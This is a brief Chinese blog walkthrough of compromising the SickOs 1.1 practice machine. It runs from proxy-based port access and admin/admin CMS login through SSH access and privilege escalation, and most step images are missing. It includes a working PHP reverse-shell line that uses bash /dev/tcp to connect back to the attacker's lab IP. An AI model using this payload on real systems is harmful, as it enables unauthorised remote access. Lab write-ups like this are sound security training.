sick0s1.1 靶机实战

sick0s1.1

信息收集

nmap存活及端口:

nmap服务扫描:

web

80和8080都没有开放,,无法访问,gobuster等工具也跑不了,访问一下3128试试

根据端口服务扫描也能得知这是个http的代理服务器,,我们添加代理后再次访问80和8080,,

80可以成功访问:

扫描后台:

访问robots.txt 发现有个cms的目录,,


 

搜到后台路径:

弱口令 admin/admin登录:

在 homepage 中添加php反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.4/2233 0>&1'"); ?>

kali开启监听

web再次访问首页 即可获得shell

发现数据库帐号密码:

ssh登录:

提权:

flag:

  • 12
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值